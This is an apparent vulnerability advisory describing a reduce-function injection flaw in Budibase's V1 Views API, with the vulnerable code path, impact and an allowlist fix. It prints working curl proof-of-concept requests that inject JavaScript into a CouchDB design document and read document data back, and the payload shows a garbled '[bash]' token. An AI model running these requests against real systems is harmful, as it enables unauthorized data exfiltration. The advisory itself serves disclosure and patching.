Budibase, Reduce Injection, (No CVE) Critical

Listen to this Post

The vulnerability exists in Budibase V1 Views API endpoint POST /api/views. A parameter called “calculation” from the request body is directly concatenated into a CouchDB reduce function definition without any validation or sanitization. The vulnerable code resides in packages/server/src/api/controllers/view/viewBuilder.ts at line 213, where the string `reduce: _${calculation}` is constructed. The V1 route has no Joi request body validator, unlike the V2 endpoint. When a user with Builder permissions submits a crafted “calculation” value, it becomes part of the CouchDB design document. CouchDB interprets any reduce value that does not start with a known built-in (_sum, _count, _stats) as a JavaScript function string, which then executes inside CouchDB’s SpiderMonkey JS engine upon view query. Although an internal SCHEMA_MAP defines allowed calculation types (sum, count, stats), this map is never used for input validation. The map function string is properly sanitized via JSON.stringify and a TOKEN_MAP allowlist, but the reduce path has no such protection. By injecting JavaScript code, an attacker can enumerate objects in the CouchDB sandbox, access all document data passed to the reduce function, and return arbitrary data in the view response. The injection persists because the reduce function is saved in the design document and runs on every query. A simplified test payload like `”calculation”: “INVALID_NOT_A_BUILTIN”` produces `reduce: “_INVALID_NOT_A_BUILTIN”` and causes a CouchDB error, confirming that arbitrary strings reach the reduce evaluator. The impact is limited to the CouchDB JS sandbox, which blocks filesystem and network access, but allows data exfiltration from the database.

dailycve form:

Platform: Budibase
Version: All vulnerable
Vulnerability: Code Injection
Severity: Critical
date: 2026-03-24

Prediction: 2026-04-15

What Undercode Say:

Verify injection point with invalid calculation
curl -X POST https://target/api/views \
-H "Content-Type: application/json" \
-H "Cookie: session=BUILDER_SESSION" \
-d '{"name":"test","tableId":"valid_id","field":"amount","calculation":"INVALID"}'
Exploit payload to exfiltrate document data
curl -X POST https://target/api/views \
-H "Content-Type: application/json" \
-H "Cookie: session=BUILDER_SESSION" \
-d '{
"name":"poc",
"tableId":"<table-id>",
"field":"amount",
"calculation":"stats\"); } function(keys,values,rereduce){ var data=\"\"; for(var i in this){data+=i+\"=\"+this[bash]+\",\";} return data; } //"
}'
Query the injected view
curl https://target/api/views/poc?group=true -H "Cookie: session=BUILDER_SESSION"

Exploit:

Authenticated Builder sends crafted calculation JavaScript that replaces reduce function; on view query, JS runs in CouchDB sandbox, returning all document fields.

Protection from this CVE:

Apply allowlist validation before reduce interpolation: const VALID_CALCULATIONS = [“sum”,”count”,”stats”]; if (calculation && !VALID_CALCULATIONS.includes(calculation)) throw error. Also add Joi validator to V1 route.

Impact:

Arbitrary JavaScript execution inside CouchDB engine, data exfiltration from all documents accessible to the view, persistence across queries. Requires Builder role. No OS RCE.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top